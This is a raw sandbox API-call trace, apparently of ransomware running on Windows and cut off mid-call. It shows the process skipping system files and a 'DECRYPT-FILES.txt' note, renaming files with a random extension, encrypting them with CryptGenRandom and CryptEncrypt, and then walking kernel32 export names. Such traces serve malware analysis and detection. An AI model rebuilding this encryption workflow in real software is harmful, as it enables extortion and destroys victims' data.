lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0082.310] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0082.311] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0082.311] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\NdoDnsxj.bmp") returned 58 [0082.311] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\NdoDnsxj.bmp.MU3tDg") returned 65 [0082.311] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\NdoDnsxj.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ndodnsxj.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\NdoDnsxj.bmp.MU3tDg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ndodnsxj.bmp.mu3tdg"), dwFlags=0x0) returned 1 [0082.311] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.312] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.312] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.312] FindNextFileW (in: hFindFile=0x5f8c58, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2ad089f0, ftCreationTime.dwHighDateTime=0x1d4cd73, ftLastAccessTime.dwLowDateTime=0x80030d90, ftLastAccessTime.dwHighDateTime=0x1d4d35d, ftLastWriteTime.dwLowDateTime=0x80030d90, ftLastWriteTime.dwHighDateTime=0x1d4d35d, nFileSizeHigh=0x0, nFileSizeLow=0x918a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Oprd.mp4", cAlternateFileName="")) returned 1 [0082.312] lstrcmpiW (lpString1="Oprd.mp4", lpString2="DECRYPT-FILES.txt") returned 1 [0082.312] lstrcmpiW (lpString1="Oprd.mp4", lpString2="autorun.inf") returned 1 [0082.312] lstrcmpiW (lpString1="Oprd.mp4", lpString2="boot.ini") returned 1 [0082.312] lstrcmpiW (lpString1="Oprd.mp4", lpString2="desktop.ini") returned 1 [0082.312] lstrcmpiW (lpString1="Oprd.mp4", lpString2="ntuser.dat") returned 1 [0082.312] lstrcmpiW (lpString1="Oprd.mp4", lpString2="iconcache.db") returned 1 [0082.312] lstrcmpiW (lpString1="Oprd.mp4", lpString2="bootsect.bak") returned 1 [0082.312] lstrcmpiW (lpString1="Oprd.mp4", lpString2="ntuser.dat.log") returned 1 [0082.312] lstrcmpiW (lpString1="Oprd.mp4", lpString2="thumbs.db") returned -1 [0082.312] lstrcmpiW (lpString1="Oprd.mp4", lpString2="Bootfont.bin") returned 1 [0082.313] lstrlenW (lpString="Oprd.mp4") returned 8 [0082.313] lstrcmpiW (lpString1="mp4", lpString2="lnk") returned 1 [0082.313] lstrcmpiW (lpString1="mp4", lpString2="exe") returned 1 [0082.313] lstrcmpiW (lpString1="mp4", lpString2="sys") returned -1 [0082.313] lstrcmpiW (lpString1="mp4", lpString2="dll") returned 1 [0082.313] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0082.313] lstrlenW (lpString="Oprd.mp4") returned 8 [0082.313] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0082.313] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="Oprd.mp4" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Oprd.mp4") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Oprd.mp4" [0082.313] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.313] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Oprd.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\oprd.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0082.313] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=37258) returned 1 [0082.313] CreateFileMappingW (hFile=0x440, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x444 [0082.313] MapViewOfFile (hFileMappingObject=0x444, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0082.313] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0082.314] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0082.314] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.314] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0082.314] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0082.315] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.315] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0082.316] CloseHandle (hObject=0x444) returned 1 [0082.316] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.316] WriteFile (in: hFile=0x440, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0082.316] CloseHandle (hObject=0x0) returned 0 [0082.316] CloseHandle (hObject=0x440) returned 1 [0082.317] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.317] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.317] GetTickCount () returned 0x114d0d7 [0082.317] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.317] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0082.317] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0082.318] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.318] lstrlenA (lpString="kernel32.dll") returned 12 [0082.318] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0082.318] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0082.318] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0082.318] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0082.318] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0082.318] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0082.318] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0082.318] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0082.318] lstrlenA (lpString="ADDATOMA") returned 8 [0082.318] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0082.318] lstrlenA (lpString="ADDATOMW") returned 8 [0082.318] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0082.318] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0082.320] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0082.320] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0082.320] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0082.320] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0082.320] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0082.320] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0082.320] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0082.320] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0082.320] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0082.320] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0082.320] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0082.320] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0082.320] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0082.320] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0082.320] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0082.320] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0082.320] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0082.321] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0082.321] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0082.321] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0082.321] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0082.321] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0082.321] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0082.321] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0082.321] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0082.321] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0082.321] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0082.321] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0082.321] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0082.321] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0082.321] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0082.321] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0082.321] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0082.321] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0082.321] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0082.321] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0082.321] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0082.321] lstrlenA (lpString="BACKUPREAD") returned 10 [0082.321] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0082.321] lstrlenA (lpString="BACKUPSEEK") returned 10 [0082.321] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0082.321] lstrlenA (lpString="BACKUPWRITE") returned 11 [0082.321] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0082.321] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0082.321] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0082.321] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0082.321] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0082.321] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0082.321] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0082.321] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0082.321] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0082.321] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0082.321] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0082.321] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0082.322] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0082.322] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0082.322] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0082.322] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0082.322] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0082.322] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0082.322] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0082.322] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0082.322] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0082.322] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0082.322] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0082.322] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0082.322] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0082.322] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0082.322] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0082.322] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0082.322] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0082.322] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0082.322] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0082.322] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0082.322] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0082.322] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0082.322] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0082.322] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0082.322] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0082.322] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0082.322] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0082.322] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0082.322] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0082.322] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0082.322] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0082.322] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0082.322] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0082.322] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0082.322] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0082.322] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0082.322] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0082.323] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0082.323] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0082.323] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0082.323] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0082.323] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0082.323] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0082.323] lstrlenA (lpString="BEEP") returned 4 [0082.323] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0082.323] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0082.323] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0082.323] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0082.323] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0082.323] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0082.323] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0082.323] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0082.323] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0082.323] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0082.323] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0082.323] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0082.323] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0082.323] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0082.323] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0082.323] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0082.323] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0082.323] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0082.323] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0082.323] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0082.323] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0082.323] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0082.323] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0082.323] lstrlenA (lpString="CANCELIO") returned 8 [0082.323] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0082.323] lstrlenA (lpString="CANCELIOEX") returned 10 [0082.323] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0082.323] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0082.323] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0082.324] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0082.324] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0082.324] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0082.324] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0082.324] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0082.324] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0082.324] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0082.324] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0082.324] lstrlenA (lpString="CHECKELEVATION") returned 14 [0082.324] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0082.324] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0082.324] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0082.324] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0082.324] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0082.324] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0082.324] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0082.324] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0082.324] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0082.324] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0082.324] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0082.324] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0082.324] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0082.324] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0082.324] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0082.324] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0082.324] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0082.324] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0082.324] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0082.324] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0082.324] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0082.324] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0082.324] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0082.324] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0082.324] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") 